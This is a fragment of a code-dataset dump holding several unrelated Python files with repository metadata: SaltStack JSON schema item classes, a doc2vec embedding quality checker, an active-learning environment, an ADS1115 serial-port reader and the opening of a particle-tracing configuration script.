RequirementsItem(SchemaItem):\n __type__ = \"object\"\n\n requirements = None\n\n def __init__(self, requirements=None):\n if requirements is not None:\n self.requirements = requirements\n super().__init__()\n\n def __validate_attributes__(self):\n if self.requirements is None:\n raise RuntimeError(\"The passed requirements must not be empty\")\n if not isinstance(self.requirements, (SchemaItem, list, tuple, set)):\n raise RuntimeError(\n \"The passed requirements must be passed as a list, tuple, \"\n \"set SchemaItem or BaseSchemaItem, not '{}'\".format(self.requirements)\n )\n\n if not isinstance(self.requirements, SchemaItem):\n if not isinstance(self.requirements, list):\n self.requirements = list(self.requirements)\n\n for idx, item in enumerate(self.requirements):\n if not isinstance(item, ((str,), SchemaItem)):\n raise RuntimeError(\n \"The passed requirement at the {} index must be of type \"\n \"str or SchemaItem, not '{}'\".format(idx, type(item))\n )\n\n def serialize(self):\n if isinstance(self.requirements, SchemaItem):\n requirements = self.requirements.serialize()\n else:\n requirements = []\n for requirement in self.requirements:\n if isinstance(requirement, SchemaItem):\n requirements.append(requirement.serialize())\n continue\n requirements.append(requirement)\n return {\"required\": requirements}\n\n\nclass OneOfItem(SchemaItem):\n\n __type__ = \"oneOf\"\n\n items = None\n\n def __init__(self, items=None, required=None):\n if items is not None:\n self.items = items\n super().__init__(required=required)\n\n def __validate_attributes__(self):\n if not self.items:\n raise RuntimeError(\"The passed items must not be empty\")\n if not isinstance(self.items, (list, tuple)):\n raise RuntimeError(\n \"The passed items must be passed as a list/tuple not '{}'\".format(\n type(self.items)\n )\n )\n for idx, item in enumerate(self.items):\n if not isinstance(item, (Schema, SchemaItem)):\n raise RuntimeError(\n \"The passed item at the {} index must be of type \"\n \"Schema, SchemaItem or BaseSchemaItem, not \"\n \"'{}'\".format(idx, type(item))\n )\n if not isinstance(self.items, list):\n self.items = list(self.items)\n\n def __call__(self, flatten=False):\n self.__flatten__ = flatten\n return self\n\n def serialize(self):\n return {self.__type__: [i.serialize() for i in self.items]}\n\n\nclass AnyOfItem(OneOfItem):\n\n __type__ = \"anyOf\"\n\n\nclass AllOfItem(OneOfItem):\n\n __type__ = \"allOf\"\n\n\nclass NotItem(SchemaItem):\n\n __type__ = \"not\"\n\n item = None\n\n def __init__(self, item=None):\n if item is not None:\n self.item = item\n super().__init__()\n\n def __validate_attributes__(self):\n if not self.item:\n raise RuntimeError(\"An item must be passed\")\n if not isinstance(self.item, (Schema, SchemaItem)):\n raise RuntimeError(\n \"The passed item be of type Schema, SchemaItem or \"\n \"BaseSchemaItem, not '{}'\".format(type(self.item))\n )\n\n def serialize(self):\n return {self.__type__: self.item.serialize()}\n\n\n# ----- Custom Preconfigured Configs -------------------------------------------------------------------------------->\nclass PortItem(IntegerItem):\n minimum = 0 # yes, 0 is a valid port number\n maximum = 65535\n\n\n# <---- Custom Preconfigured Configs ---------------------------------------------------------------------------------\n\n\nclass ComplexSchemaItem(BaseSchemaItem):\n \"\"\"\n .. versionadded:: 2016.11.0\n\n Complex Schema Item\n \"\"\"\n\n # This attribute is populated by the metaclass, but pylint fails to see it\n # and assumes it's not an iterable\n _attributes = []\n _definition_name = None\n\n def __init__(self, definition_name=None, required=None):\n super().__init__(required=required)\n self.__type__ = \"object\"\n self._definition_name = (\n definition_name if definition_name else self.__class__.__name__\n )\n # Schema attributes might have been added as class attributes so we\n # and they must be added to the _attributes attr\n self._add_missing_schema_attributes()\n\n def _add_missing_schema_attributes(self):\n \"\"\"\n Adds any missed schema attributes to the _attributes list\n\n The attributes can be class attributes and they won't be\n included in the _attributes list automatically\n \"\"\"\n for attr in [attr for attr in dir(self) if not attr.startswith(\"__\")]:\n attr_val = getattr(self, attr)\n if (\n isinstance(getattr(self, attr), SchemaItem)\n and attr not in self._attributes\n ):\n\n self._attributes.append(attr)\n\n @property\n def definition_name(self):\n return self._definition_name\n\n def serialize(self):\n \"\"\"\n The serialization of the complex item is a pointer to the item\n definition\n \"\"\"\n return {\"$ref\": \"#/definitions/{}\".format(self.definition_name)}\n\n def get_definition(self):\n \"\"\"Returns the definition of the complex item\"\"\"\n\n serialized = super().serialize()\n # Adjust entries in the serialization\n del serialized[\"definition_name\"]\n serialized[\"title\"] = self.definition_name\n\n properties = {}\n required_attr_names = []\n\n for attr_name in self._attributes:\n attr = getattr(self, attr_name)\n if attr and isinstance(attr, BaseSchemaItem):\n # Remove the attribute entry added by the base serialization\n del serialized[attr_name]\n properties[attr_name] = attr.serialize()\n properties[attr_name][\"type\"] = attr.__type__\n if attr.required:\n required_attr_names.append(attr_name)\n if serialized.get(\"properties\") is None:\n serialized[\"properties\"] = {}\n serialized[\"properties\"].update(properties)\n\n # Assign the required array\n if required_attr_names:\n serialized[\"required\"] = required_attr_names\n return serialized\n\n def get_complex_attrs(self):\n \"\"\"Returns a dictionary of the complex attributes\"\"\"\n return [\n getattr(self, attr_name)\n for attr_name in self._attributes\n if isinstance(getattr(self, attr_name), ComplexSchemaItem)\n ]\n\n\nclass DefinitionsSchema(Schema):\n \"\"\"\n .. versionadded:: 2016.11.0\n\n JSON schema class that supports ComplexSchemaItem objects by adding\n a definitions section to the JSON schema, containing the item definitions.\n\n All references to ComplexSchemaItems are built using schema inline\n dereferencing.\n \"\"\"\n\n @classmethod\n def serialize(cls, id_=None):\n # Get the initial serialization\n serialized = super().serialize(id_)\n complex_items = []\n # Augment the serializations with the definitions of all complex items\n aux_items = cls._items.values()\n\n # Convert dict_view object to a list on Python 3\n aux_items = list(aux_items)\n\n while aux_items:\n item = aux_items.pop(0)\n # Add complex attributes\n if isinstance(item, ComplexSchemaItem):\n complex_items.append(item)\n aux_items.extend(item.get_complex_attrs())\n\n # Handle container items\n if isinstance(item, OneOfItem):\n aux_items.extend(item.items)\n elif isinstance(item, ArrayItem):\n aux_items.append(item.items)\n elif isinstance(item, DictItem):\n if item.properties:\n aux_items.extend(item.properties.values())\n if item.additional_properties and isinstance(\n item.additional_properties, SchemaItem\n ):\n\n aux_items.append(item.additional_properties)\n\n definitions = OrderedDict()\n for config in complex_items:\n if isinstance(config, ComplexSchemaItem):\n definitions[config.definition_name] = config.get_definition()\n serialized[\"definitions\"] = definitions\n return serialized\n","repo_name":"saltstack/salt","sub_path":"salt/utils/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":55561,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"71424577532","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 1 16:54:54 2017\n\n@author: Samuele Garda\n\"\"\"\nimport logging\nimport numpy as np\nfrom collections import OrderedDict,Counter\nfrom ml_metrics import apk\nfrom utils import majority_vote\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(format = '%(asctime)s : %(levelname)s : %(module)s: %(message)s', level = 'INFO') \n\n\nclass QualityChecker(object):\n \"\"\"\n Object performing quality check of document embeddings\n \"\"\"\n \n def __init__(self,models,corpus):\n \"\"\"\n Construct new object\n \"\"\"\n self.corpus = corpus\n self.models = models if isinstance(models,dict) else OrderedDict((str(model).replace('/','-'),model) for model in models)\n self.rand_id = np.random.randint(len(corpus))\n \n \n def current_losses(self):\n \"\"\"\n Log current loss for model.\n \n :param model: gensim.models\n \n \"\"\"\n for name,model in self.models:\n logger.info(\"{0} current loss {1}\".format(name,model.get_latest_training_loss()))\n \n def trained_most_similar(self,topk):\n \"\"\"\n Log `n_top` most similar documents to given random document.\n \n :param model: gensim model\n :param corpus: corpus\n :param n_top: n most similar\n \"\"\"\n for name,model in self.models.items():\n tag = self.corpus[self.rand_id].tags\n logger.info(\"{0} - training - most similar for {1} : {2}\\n\".format(name, tag, model.docvecs.most_similar(tag, topn=topk)))\n \n \n def inferred_most_similar(self,topk):\n \"\"\"\n Log `n_top` most similar documents to inferred vector for words present in random document.\n \n :param models: gensim model\n :param corpus: corpus\n :param n_top: n most similar\n \"\"\"\n for name,model in self.models.items():\n inferred_vector = model.infer_vector(self.corpus[self.rand_id].words)\n tag = self.corpus[self.rand_id].tags\n logger.info(\"{0} - inferred - most similar for {1} : {2}\\n\".format(name, tag, model.docvecs.most_similar([inferred_vector], topn=topk)))\n \n \n def base_check_from_config(self,config_train):\n \n log_train = config_train.getint('quality_check_infered')\n log_inferred = config_train.getint('quality_check_infered')\n \n if log_train:\n \n self.trained_most_similar(topk = log_train)\n \n if log_inferred:\n \n self.inferred_most_similar(topk = log_inferred)\n \n def count_ranks(self,models, corpus):\n \n for model_name,model in models.items():\n ranks = []\n for doc_id in range(len(corpus)):\n inferred_vector = model.infer_vector(corpus[doc_id].words)\n sims = model.docvecs.most_similar([inferred_vector], topn=len(model.docvecs))\n rank = [docid for docid, sim in sims].index(doc_id)\n ranks.append(rank)\n \n logger.info(\"Ranks count for {} : {}\".format(model_name,dict(Counter(ranks))))\n\ndef mapk_train_vectors(models,labels, k=10):\n \"\"\"\n Log model MAP@k scores of models.\n \n :params:\n \n models (dict) : dict (name,model)\n labels (dict) : dict mapping item to its recommendations\n k (int) : K in MAP@K\n \n \"\"\"\n \n logger.info(\"Starting evaluation process for MAP@{}...\".format(k))\n \n best_score = 0\n best_model = None\n \n for model in models:\n \n predictions = {}\n \n for doc_id in labels.keys():\n try:\n predictions[doc_id] = [l[0] for l in model.docvecs.most_similar(doc_id,topn = k)]\n except TypeError:\n pass\n \n mapk = np.mean([apk(labels[doc_id],predictions[doc_id],k) for doc_id in labels.keys() if doc_id in predictions.keys()])\n logger.info(\"{0} - MAP@{1} : {2}\\n\".format(str(model),k, mapk))\n \n if mapk > best_score:\n best_score = mapk\n best_model = str(model)\n \n logger.info(\"Best model with MAP@{0} = {1} : {2} \\n \".format(k,best_score,best_model))\n \n \ndef evaluate_tpr_indices(models,corpus,topk):\n \"\"\"\n Evaluate document embeddings with TPR. For each document in `test_set` infer vector and find `k` nearest document (cosine similarity).\n Take majority vote on the inferred labels.\n \n :params:\n \n models (dict) : dict (name,model) of gensim.Doc2Vec models to be tested\n test_set (list) : list of docuemnts in namedtuple format. Thet MUST have at least `words` and `tags` attributes\n topk (int) : how many documents to predict\n \n \"\"\"\n \n logger.info(\"Starting evaluation process - TPR@{}\\n\".format(topk))\n \n tl_list = [doc.tags[0].split('\\t')[0] for doc in corpus]\n \n unique_names = set(tl_list)\n \n label2index = {name : i for i,name in enumerate(unique_names,start = 1)}\n \n index2lable = {v : k for k,v in label2index.items()}\n \n true_labels = np.asarray([label2index[l] for l in tl_list])\n \n labels_count = Counter(true_labels)\n \n for model in models:\n \n logger.info(\"\\nEvaluating `{}`\".format(str(model)))\n \n logger.info(\"Inferring vectors for {} documents\".format(len(corpus)))\n \n inferred_vectors = [model.infer_vector(doc.words) for doc in corpus]\n \n most_similars = [model.docvecs.most_similar([inf_vec], topn=topk) for inf_vec in inferred_vectors]\n \n all_votes = [[news.split('\\t')[0] for (news,score) in ms] for ms in most_similars]\n \n predicted = np.asarray([label2index[majority_vote(votes)[0]] for votes in all_votes])\n \n scores = {}\n \n for label,count in labels_count.items():\n \n by_class_pred = np.where(predicted != label,0,label)\n \n hits = np.sum(by_class_pred == true_labels)\n \n scores[index2lable[label]] = hits / count\n \n logger.info(\"TPR@10 : {}\".format(scores))\n \n logger.info(\"Average TPR@10 : {}\".format(np.sum(predicted==true_labels)/len(true_labels)))\n \n \n\n \n \n \n \n \n \n# \n#def get_most_median_least_similar(model,corpus,rand_id):\n# \"\"\"\n# Print most,median,least similar documents to a random document.\n# \n# :param model: gensim model\n# :param corpus: corpus\n# \"\"\"\n# sims = model.docvecs.most_similar(rand_id, topn=model.docvecs.count)\n# logger.info(u'TARGET (%d): «%s»\\n' % (rand_id, ' '.join(corpus[rand_id].words)))\n# logger.info(u'SIMILAR/DISSIMILAR DOCS PER MODEL %s:\\n' % model)\n# for label, index in [('MOST', 0), ('MEDIAN', len(sims)//2), ('LEAST', len(sims) - 1)]:\n# logger.info(u'%s %s: «%s»\\n' % (label, sims[index], ' '.join(corpus[sims[index][0]].words)))\n \n \n \n","repo_name":"julian-risch/ICADL2018","sub_path":"quality_check.py","file_name":"quality_check.py","file_ext":"py","file_size_in_byte":6370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"35141707372","text":"from typing import List\nfrom math import ceil\nimport copy\n\nimport numpy as np\n\nfrom supervised_learning_tasks.task_supervised import TaskSupervised\nfrom AL_environment_MDP.al_mdp_observation import Observation\n\n\nclass ALEnvironment():\n\n def __init__(self, al_parameters, task: TaskSupervised):\n al_parameters.annotationBudget = min(al_parameters.annotationBudget, task.get_no_training_samples())\n self.task = task\n self.al_parameters = al_parameters\n\n def step(self, action: List[int], verbose=True) -> (Observation, float, bool, dict):\n\n subset_IDs = [self.unlabelled_IDs[i] for i in action]\n\n # if batchSize is larger than remaining annotation budget, reduce samples to label\n remaining_budget = self.al_parameters.annotationBudget - (len(self.labelled_IDs) + len(self.batch))\n if len(subset_IDs) > remaining_budget:\n subset_IDs = list(subset_IDs[:remaining_budget])\n\n # update sets: put subset_IDs from labelled set to batch\n self.batch += subset_IDs\n old_no_unlabelled_IDs = len(self.unlabelled_IDs)\n self.unlabelled_IDs = copy.copy(list(set(self.unlabelled_IDs) - set(subset_IDs)))\n if len(self.unlabelled_IDs) != old_no_unlabelled_IDs - len(subset_IDs):\n raise ValueError\n\n # perform update\n epoch_finished = len(self.labelled_IDs) + len(self.batch) >= self.al_parameters.annotationBudget\n if len(self.batch) == self.al_parameters.batch_size_annotation or epoch_finished:\n # update sets: put IDs from batch to labelled_IDs\n self.labelled_IDs = copy.copy(self.labelled_IDs + self.batch)\n self.batch = []\n\n # retrain supervised learning model\n loss, accuracy = self.task.train_on_batch(self.labelled_IDs)\n reward = self.oldInfo[\"loss\"] - loss\n\n # calculate Info\n info = dict()\n info[\"loss\"] = loss\n info[\"no_labelled_samples\"] = len(self.labelled_IDs)\n info[\"accuracy\"] = accuracy\n\n observation = self.define_observation()\n else:\n observation = self.oldObservation\n observation.update_features_based_on_action(action)\n\n reward = 0\n info = self.oldInfo\n info[\"no_labelled_samples\"] = len(self.labelled_IDs)\n\n self.oldObservation = observation\n self.oldInfo = info\n\n return observation, reward, epoch_finished, info\n\n def reset(self) -> Observation:\n\n # define labelled and unlabelled Set by their IDs\n self.labelled_IDs = list(np.random.randint(0, self.task.get_no_training_samples(), self.al_parameters.startingSize))\n # print(f\"labelled IDs: {self.labelled_IDs}\")\n allIDs = list(range(self.task.get_no_training_samples()))\n self.unlabelled_IDs = list(set(allIDs) - set(self.labelled_IDs))\n self.batch = []\n\n # define accuracy\n loss, accuracy = self.task.train_on_batch(self.labelled_IDs)\n\n # calculate Info\n info = dict()\n info[\"loss\"] = loss\n info[\"no_labelled_samples\"] = len(self.labelled_IDs)\n info[\"accuracy\"] = accuracy\n # self.initialInfo = info\n\n observation = self.define_observation()\n\n self.oldObservation = observation\n self.oldInfo = info\n\n return observation\n\n def render(self, mode='human'):\n raise NotImplementedError\n\n def define_observation(self) -> Observation:\n observation = Observation(self.task, self.labelled_IDs, self.unlabelled_IDs, self.batch)\n return observation\n\n def expected_number_iterations(self) -> int:\n expectedNoIterations = self.al_parameters.annotationBudget - self.al_parameters.startingSize\n return expectedNoIterations\n","repo_name":"MalteEbner/Learning-active-learning-with-ensembles-of-active-learning-agents","sub_path":"AL_environment_MDP/al_environment.py","file_name":"al_environment.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"70097506173","text":"import argparse, sys, os\nimport serial.tools.list_ports\n\navailable_ports = serial.tools.list_ports.comports()\nprint(\"\\nAvailable serial ports:\")\nprint(' '.join([x.name for x in available_ports])+ '\\n')\n\nparser = argparse.ArgumentParser(description='Read byte values from UART')\nparser.add_argument('com', metavar='COMX', type=str,\n help=\"Name the serial port from the list above\")\nparser.add_argument('--baud', metavar='BAUD_RATE', type=int, default=115200,\n help=\"Baud rate (default 115200)\")\nargs = parser.parse_args()\n\n# Open the serial port\ntimeout_seconds = 1\nser = serial.Serial(args.com, args.baud, timeout=timeout_seconds)\n\nprint(f\"Opening {args.com} with baud rate {args.baud}. Press Ctrl+C to break.\\n\")\n\ntry:\n while True:\n bytes_to_read = 2\n read_bytes = ser.read(bytes_to_read)\n if read_bytes == b'':\n print(f\"Read timed out after {timeout_seconds} seconds\")\n exit(1)\n \n MSB = read_bytes[0]\n LSB = read_bytes[1]\n\n DAC = (MSB << 8) + LSB\n # print(f\"DAC: {DAC} raw value \")\n if (DAC < 0):\n DAC = (1<<15) + DAC\n else:\n if (DAC & (1<<15)) != 0:\n DAC = DAC - (1<<15)\n #DAC = (0x7FFF - DAC) + 1 # binary compliment\n #DAC = ~DAC + 1 # binary compliment\n if ((MSB & 0x80) == 0x80):\n DAC = DAC - 32768\n\n val = DAC\n \n # Print decimal number and a horizontal bar of #### chars\n max_cols = os.get_terminal_size().columns - 6\n bar_width_cols = val * (max_cols / (32767))\n print(f'{val:-5d} ' + '#' * round(bar_width_cols))\n\nexcept KeyboardInterrupt:\n sys.exit()\n\n","repo_name":"HaraldBlab/vhdl-projects","sub_path":"ads1115_reader/ads1115_demo/ads1115_demo_serial.py","file_name":"ads1115_demo_serial.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19002237369","text":"#!/usr/bin/env python\n\"\"\"\nuser_{...}.py is the main user-facing interface to trochograph, a test-particle\ntracing program. This user file serves as both\n* configuration: user specifies input parameters, fields, particles\n* main program: calls run_trochograph(...) to start the evolution loop.\n\nUsage:\n\n NUMBA_NUM_THREADS={xx} python user_{...}.py\n\n\"\"\"\n\nfrom __future__ import division, print_function\nimport numba\nimport numpy as np\n#import matplotlib.pyplot as plt\nfrom os import path\n\nimport faulthandler\nfaulthandler.enable()\n\nfrom mark import TristanRun\nfrom trochograph import Fields, Particles, interp, run_trochograph, tprint\n\n# global prtl arrays: struct w/ p.{x,y,z,u,v,w,ind,proc}\n# global fld arrays: flds.{ex,ey,ez,bx,by,bz}\n# global scalar constants: par.{c,qm}\n\n# user must provide parameters: c, interval, lapst, last, pltstart, qm\n# and also fields and prtls, of course\n\nRUNDIR = \"/rigel/astro/users/at3222/aaron_heating/mi400Ms4betap0.25theta25phi90_1d_comp20_ntimes64_later\"\nRUN = TristanRun(RUNDIR)\nSCENE = RUN[0]\n\nU0 = 1.6863e-2 # inflow velocity\nUSH = 0.036684958 # shock velocity, Gamma=5/3 assumed\nVBOOST = USH - U0 # non-rel boost from lab to shock frame, so vboost > 0 points along +\\hat{x}\n\ndef user_input():\n \"\"\"Define a bunch of input parameters\"\"\"\n par = {}\n\n #